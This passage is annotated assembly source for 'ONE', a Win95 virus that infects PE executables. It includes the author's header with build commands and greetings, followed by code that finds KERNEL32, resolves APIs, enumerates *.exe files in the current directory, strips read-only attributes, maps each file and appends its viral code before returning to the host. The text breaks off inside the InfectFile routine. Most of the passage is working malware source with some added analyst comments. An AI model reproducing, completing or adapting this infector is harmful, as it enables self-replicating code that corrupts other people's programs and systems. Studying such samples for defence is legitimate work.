; ONE V1.0b By JFK/SGWW
;
;
; ONE is not only my first Win95 virus, but also my first virus
; which I have released. I'm not really all that proud of it,
; cause it didn't turn out at all to be what I had expected. But hey,
; maybe next time :) Hmmm, this virus really has no chance of
; spreading because it never moves out of its current directory.
; It's more or less just a learning experience.
;
; Features:
; * File Mapping (though it's sorta pointless because of all
; the normal reads)
; * Capable of infecting read only files.
; * Only increases a file's size if it has to.
; * LOTS O' COMMENTS!!!! :-)
;
; Description:
; One will look in the current directory for *.exe files until
; it finds one that it should/can infect or until there are no
; more exe files. When an exe file is found, One reads in the PE
; header, and object table. One closes the file and looks for
; the next exe file if it determines the current file has already
; been infected. If the file has not been infected, One figures
; out all the new sizes of objects and stuff like that for the
; host. One then maps the file to memory, fills in the new PE
; header, object table, and appends the virus code to the end of
; the last object. One then unmaps the file, and closes it which
; automatically saves the changes made while mapped. One then
; starts all over looking for more *.exe files, if one is not found,
; control is given to the host's original entry point.
;
; Notes:
; * ONE will NOT work on WinNT
; * First generations crash. (because OldEA is 0)
; * Some code was taken from Mr. Klunky by DV8 and Yurn by Virogen.
;
; Greetz:
; Dakota: Your web page looks pretty nice!
; #virus & #vir (undernet): hiya :)
; SGWW: Thanx for accepting me as one of you.
; paw: Watch out pal, I've been practicing my trivia!
; RAiD: alt.comp.virus.raid-vs-avers??? :)
; Yesna: Did you forget your password on X? You never have ops! =)
; Opic: Did you find any good BBS's yet!?!? heheh
; LovinGod: You need a book on winsock bro! ;)
; Virogen: Ok, so this is not exactly the kernel infector I was talking about.
; Gloomy: ne ebi mozgi! :))))
;
; Assemble with:
; tasm32 -ml -m5 -q -zn one.asm
; tlink32 -Tpe -c -x -aa one,,, import32
; pewrsec one.exe
.386p
.model flat
include Win32API.inc
v_size equ v_end - v_start ;Virus absolute size in files: bytes between the v_start and v_end labels.
extrn ExitProcess :proc
.data
db ? ;Some dummy data so tlink32 doesn't yell.
.code
;-----------------------------------------------------------------------
; v_start - entry point of the viral code (the host's PE entry point is
;           redirected here; the host's original entry is kept in OldEA).
; Flow:     (1) find a PE header at a hard-coded Win9x address to get
;           KERNEL32's image base, (2) walk its export table to resolve
;           GetProcAddress, (3) fill ImportTable with API addresses,
;           (4) FindFirstFileA/FindNextFileA over *.exe in the current
;           directory, handling each file via a file mapping,
;           (5) popad / ret into the host's original entry point.
; Stack:    the first "push eax" reserves one dword; it is overwritten
;           with OldEA below so that the final "ret" at RestoreHost
;           transfers to the host after popad restores all registers.
; Regs:     EBP = delta offset; every data reference is [ebp+symbol].
; Analyst notes: the fixed 0BFF70000h scan start and the "PE\0\0" +
;           IMAGE_FILE_DLL check are the recognisable traits of this
;           loader, and are consistent with the header note that it does
;           not run on WinNT. Helpers called below (ExtractAbsoluteAddress,
;           MyGetProcAddress, ReadInPEHeader, SetNOAttribs, OpenFile,
;           MapFile, InfectFile, CloseFile, RestoreAttribs) are defined
;           outside this block; their contracts are taken from the
;           author's comments and are not verified here.
;-----------------------------------------------------------------------
v_start:
push eax ;Reserve one dword on the stack; "ret" at RestoreHost consumes it.
pushad ;Save all general registers (32 bytes).
add esp, 36d ;ESP -> the dword above the reserved slot (ESP as it was on entry).
call OldTrick ;Push the current EIP to obtain the delta offset.
OldTrick: pop ebp
sub ebp, offset OldTrick ;EBP = delta offset (runtime address - assembled address).
mov eax, [ebp+OldEA] ;Host's original entry point (0 in a first generation - see header note).
push eax ;Store it in the reserved slot: the "ret" at RestoreHost jumps there.
sub esp, 32d ;ESP back to the bottom of the pushad area so popad finds it.
mov eax, 15d
mov [ebp+lpfGetProcAddress], eax ;Seed the GetProcAddress record with 15; presumably a length used by ExtractAbsoluteAddress (not visible here) - confirm.
findK32PEHeader:
mov edi, 0BFF6FFFFh ;One byte below the hard-coded Win9x KERNEL32 region; inc'ed below.
mov ecx, 00000300h ;Scan budget in bytes; shared across re-entries via F_PE_I_Edi.
mov eax, 00004550h ;"PE\0\0" as a little-endian dword.
F_PE_I_Edi:
inc edi
Find_PE:
repne scasb ;Scan for AL = 'P' (low byte of EAX).
jne RestoreHost ;Budget exhausted without a match: give up and run the host.
cmp [edi-1], eax ;SCASB left EDI one past the match; is the dword there "PE\0\0"?
jne Find_PE ;Nope, continue scanning.
dec edi ;EDI -> PE signature.
mov bx, word ptr [edi+16h] ;COFF FileHeader.Characteristics.
and bx, 0F000h ;Keep bits 12..15 only.
cmp bx, 2000h ;Exactly IMAGE_FILE_DLL among those bits?
jne F_PE_I_Edi ;Not a DLL, so it can't be KERNEL32; resume scanning at the next byte.
mov eax, [edi+34h] ;OptionalHeader.ImageBase.
mov [ebp+K32Base], eax ;Save image base.
mov ebx, [edi+78h] ;DataDirectory[EXPORT].VirtualAddress.
add ebx, [ebp+K32Base] ;EBX -> IMAGE_EXPORT_DIRECTORY.
mov edi, [ebx+20h] ;AddressOfNames (RVA of the name-pointer array).
add edi, [ebp+K32Base] ;EDI -> name-pointer array.
;Determine offset for unnamed functions.
mov ecx, [ebx+14h] ;NumberOfFunctions...
sub ecx, [ebx+18h] ;...less NumberOfNames...
mov eax, 4 ;...times four.
mul ecx ;Do it (clobbers EDX).
mov [ebp+UnnamedOffset], eax ;Save it (consumed outside this block).
;Calculate the byte size of the name-pointer array.
mov ecx, [ebx+18h] ;NumberOfNames...
mov eax, 4 ;...times four.
mul ecx ;Do it.
xchg ecx, eax ;ECX = byte size of the array.
mov edx, edi ;MUL clobbered EDX; EDX = start of the array (EDI is reused as scratch below).
CheckFunctionName:
sub ecx, 4 ;Step back one entry: the array is walked from its end (wraps if NumberOfNames is 0).
mov edi, edx ;Base address...
add edi, ecx ;...plus array index.
mov edi, [edi] ;RVA of this export's name.
add edi, [ebp+K32Base] ;EDI -> ASCIIZ export name.
lea esi, [ebp+lpfGetProcAddress] ;GetProcAddress record.
lea eax, [ebp+lpfGetProcAddress] ;Where the resolved entry point is to be written.
call ExtractAbsoluteAddress ;Compare/resolve this name (not visible here; assumed to preserve ECX and EDX).
cmp ecx, 0 ;Checked all the names?
jne CheckFunctionName ;Nope. Check the next name.
cmp [ebp+lpfGetProcAddress], 00h ;Did we get it?
je RestoreHost ;Nope! :(
;Resolve every API in ImportTable. Layout as used here: ASCIIZ name,
;then a 4-byte slot that receives its address, repeated; a leading '-'
;byte ends the table.
lea esi, [ebp+ImportTable] ;ESI -> first name in the structure.
mov edx, esi ;EDX = scan cursor.
GFO_NextChar:
mov bl, [edx] ;BL = next char in table.
cmp bl, 0 ;End of this name?
je GFO_ItsZero ;Yeah.
cmp bl, '-' ;End of the table?
je After_GFO ;Yeah, continue.
inc edx ;Next char.
jmp GFO_NextChar ;Loop.
GFO_ItsZero:
inc edx ;EDX -> the 4-byte slot following the name.
mov eax, esi ;EAX -> function name.
push edx ;Save EDX across the call.
call MyGetProcAddress ;Resolve this function (not visible here); CF set on failure.
jc RestoreHost ;Quit on fail.
pop edx ;Restore EDX.
mov [edx], eax ;Store the address in the slot.
add edx, 4 ;EDX -> next function's name.
mov bl, [edx] ;BL = first char of name.
cmp bl, '-' ;Are we done yet?
je After_GFO ;Yep.
mov esi, edx ;ESI -> next function's name.
inc edx ;Check next char.
jmp GFO_NextChar ;Do it.
After_GFO:
;Enumerate *.exe in the current directory using the lpsExeFiles pattern.
lea eax, [ebp+FoundFileData] ;WIN32_FIND_DATA output buffer.
push eax
lea eax, [ebp+lpsExeFiles] ;Search pattern.
push eax
call [ebp+lpfFindFirstFileA] ;FindFirstFileA(lpsExeFiles, &FoundFileData) through the resolved pointer.
;On return EAX = search handle, or 0FFFFFFFFh (INVALID_HANDLE_VALUE)
;if nothing matched.
cmp eax, 0FFFFFFFFh ;No file found?
je RestoreHost ;No exe files in this folder.
mov [ebp+FoundFileHandle], eax ;Save the search handle.
MainLoop:
call ReadInPEHeader ;Read in the file's PE header; EBX = 0 means skip this file.
cmp ebx, 0 ;Did we fail?
je FindNextFile ;Next file.
call SetNOAttribs ;Clear the file's attributes (this is what lets read-only hosts be written).
jc FindNextFile ;Couldn't set attributes.
call OpenFile ;Open the file.
jc FindNextFile ;Couldn't open file.
call MapFile ;Map the file into memory; base kept in MapBaseAddr.
jc MapFailed ;Couldn't map file.
call InfectFile ;Write the new header/object table and code through the mapping.
push dword ptr [ebp+MapBaseAddr]
call [ebp+lpfUnmapViewOfFile] ;UnmapViewOfFile(MapBaseAddr); changes made via the mapping are committed on unmap/close.
MapFailed:
call CloseFile ;Close the file.
call RestoreAttribs ;Restore the original attributes.
FindNextFile:
lea eax, [ebp+FoundFileData] ;Where to store results.
push eax
push dword ptr [ebp + offset FoundFileHandle]
;Search handle from FindFirstFileA above.
call [ebp+lpfFindNextFileA] ;FindNextFileA(handle, &FoundFileData).
or eax, eax ;Non-zero = another match.
jnz MainLoop ;Yes, continue the search.
RestoreHost:
;Common exit for success and every failure path above.
popad ;Restore the host's registers.
ret ;Pops the OldEA dword stored at entry -> host's original entry point.
;***********************
;****** Functions ******
;***********************
;**** InfectFile ****
InfectFile PROC
;Append virus code to end of last object.
mov edx, [ebp+OldPhysSize] ;Physical size of object.
add edx, [esi+20d] ;Physical offset of object.
add edx, [ebp+MapBaseAddr] ;Plus of mapped object.